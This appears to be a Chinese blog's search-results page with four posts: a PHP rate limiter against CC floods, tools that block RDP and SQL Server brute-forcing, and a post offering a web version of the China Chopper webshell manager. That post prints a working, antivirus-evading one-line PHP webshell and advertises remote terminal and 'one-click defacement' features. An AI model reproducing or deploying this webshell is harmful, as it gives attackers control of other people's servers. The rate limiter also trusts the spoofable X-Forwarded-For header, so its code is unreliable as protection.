搜索到
4
篇与
的结果
-
PHP简单防CC攻击方法 开发原因由于咔咔云Api站点经常被频繁恶意请求,且偶尔还会被CC攻击的问题,所以咔咔云站长开发了一套防止非正常高频率请求和防止一般CC攻击的PHP版本代码。优势:{card-describe title="主要功能"}PHP访问频率限制,防CC攻击,支持上万并发。简单易用,无论你懂不懂PHP开发,只要会复制粘贴就行。Memcached内存缓存技术,高性能,高并发。精准无误,0误封。能防护QPS10000以内的CC攻击,看机器配置,有可能更高。支持范围较广,直接你网站支持PHP就行。源码简单,可自行修改,可以套自己喜欢的前端模板主题。{/card-describe}环境要求:PHP版本 ≥ 7.2PHP需安装Memcached扩展Memcached ≥1.6使用方法将以下开源代码添加到你网站核心文件中,相当于你网站任何页面都会引用的一个文件。如:config.php,common.php,Ajax.php等。开发源码ini_set("display_errors", "Off"); error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); extension_loaded('memcached') or die('memcached扩展未安装!'); $logPath = $_SERVER['DOCUMENT_ROOT'] . '/waf/waf.log'; //日志记录文件保存路径,$_SERVER['DOCUMENT_ROOT']是网站根目录 $fileht = $_SERVER['DOCUMENT_ROOT'] . '/waf/ban.log'; //被拉黑IP记录文件保存路径 if (!file_exists($logPath)) { @mkdir($_SERVER['DOCUMENT_ROOT'] . '/waf/', 0777, true); @file_put_contents($logPath, ''); @file_put_contents($fileht, ''); } $allowtime = 2; //防刷新时间(秒) $allownum = 5; //防刷新次数(比如2秒5次,超过就警告) $allowRefresh = 10; //在此警告次数之后拉黑IP $bantime = 600; //封禁时间,超时自动解封(秒) $ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; $uri = $_SERVER['PHP_SELF']; $cache = new Memcached(); $cache->addServer('127.0.0.1', '11211') or die('memcached连接失败!'); $inban = $cache->get('waf-ban-' . $ip); if ($inban) { header("HTTP/1.1 403 Forbidden"); exit('<h1>403 Forbidden 非法访问</h1> <p>你的请求似乎不符合常理,已被服务器防火墙拦截,如有疑问请联系管理员QQ79087446/br>如果你在开发测试过程中超频被封IP,请等待' . ($bantime / 60) . '分钟后自动解封</br>你的IP:' . $ip . '</p>'); } $wafarr = $cache->get('waf-' . $ip); if (!$wafarr) { $wafarr = [ 'path' => $uri, 'time' => time() + $allowtime, 'sum' => 1, ]; $cache->set('waf-' . $ip, $wafarr, time() + $allowtime); } else { if ($wafarr['sum'] > $allownum) { $wafsum_arr = $cache->get('waf-sum-' . $ip); if (!$wafsum_arr) { $wafsum_arr = [ 'sum' => 1, ]; $cache->set('waf-sum-' . $ip, $wafsum_arr, time() + $bantime); } else { if ($wafsum_arr['sum'] > $allowRefresh) { $cache->set('waf-ban-' . $ip, 1, time() + $bantime); file_put_contents($fileht, $ip . "\n", FILE_APPEND); } else { $wafsum_arr['sum']++; $cache->set('waf-sum-' . $ip, $wafsum_arr, time() + $bantime); } } file_put_contents($logPath, $ip . '--' . date('Y-m-d H:i:s', time()) . '--' . $uri . "\n", FILE_APPEND); header("HTTP/1.1 403 Forbidden"); exit("请求频率QPS超过限制,请酌情访问,多次提醒后会封禁IP!"); } else { $wafarr['sum']++; $cache->set('waf-' . $ip, $wafarr, $wafarr['time']); } } -
2023网站渗透利器web版源码 什么是中国菜刀中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用,是在web渗透测试中用于连接一句话木马的工具,只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE方式编译,支持多国语言输入显示。程序开发原由因中国菜刀的简单实用,而被很多人追捧,但是现在网络上存在的版本都存在后门,即所谓的黑吃黑的现象!所以咔咔云站长开发了一款web版中国菜刀,而且是全开源的,不用担心后门的问题。主要功能有文件管理,虚拟终端,文件查看,图片查看,一键挂黑等。缺点功能比较单一,缺少对数据库的操作,欢迎各位朋友二开添加更多实用功能!安装将程序上传解压到你的站点根目录即可!使用方法1.首先创建一个免杀一句话木马, kkjsz.cn 为一句话的连接密码<?php $a = $GLOBALS; $str = '_POST'; eval/**nice**/(''. $a[$str]['kkjsz.cn']. NULL); ?>2.文件管理,可用于对文件的查看重命名删除等操作 3.终端命令 {cloud title="中国菜刀web版源码" type="lz" url="https://wwb.lanzoub.com/ilK8g05kn8wj" password=""/}
-
RDP端口防穷举工具v1.0 开发初衷由于最近内网有台frp穿透rdp出去的办公机器使用了弱密码,导致被穷举到了密码进来种下勒索病毒,因此咔咔云站长非常恼火。frp穿透的机器比较多,没有留意审核才导致这样的问题,所以一直在想如何解决这个痛点,网络上扫描3389并且尝试穷举的坏人太多太多,非常的烦恼。之后,咔咔云站长有尝试过多种软件,安全狗,windows自带的密码错误次数锁账号,banIP等等都不是很满意。其实只需要软件解决一个痛点,就是能自动筛选出那些尝试扫描穷举的IP,并且自动把这些可恶IP封掉,就大功告成。于是经过本人观察并思考,那些扫描穷举的IP他们每次尝试都会发起新的连接,而每个新的连接,远端连接端口都是会变化的,那么我们就可以利用这个特征识别出那些可恶IP了,这就是原理。所以本工具只能保护长TCP连接服务的端口,web的就不行了,因为web端口本来就是不停请求不停断开的。有了思路,本工具就开发了出来,原理很简单,所以软件也没什么技术难度,但确实能很好的自动对付那些可恶的扫描IP,软件小巧简单且开源,有需要的朋友可以使用能对付那些穷举坏人,大大提升网络安全性。 注意:理论上只要是长TCP连接服务的端口都可以进行保护。{cloud title="RDP端口防穷举保护V1.0" type="lz" url="https://wwb.lanzoub.com/ijQcY0dyh26d" password=""/}
-
Sqlserver 爆破IP扫描器 虽然除了内网之外,现在基本没有了,因为SA是可以设空的。但是避免不了有懒人,所以咔咔云站长特意做了这么一个小软件,希望能帮助到各位站长朋友。其实,数据库只要往外开放了,就会有人来爆,不偷懒,不使用默认用户名,安全度还是比较高的。 主要功能1.用来检测当前服务器的Sqlserver数据库是否被人进行暴力破解,获取暴力破解的IP然后用火绒添加IP黑名单2.支持所有SqlServer版本{cloud title="SqlServer检测" type="lz" url="https://wwb.lanzoub.com/iqNQu0dyf60j" password=""/}
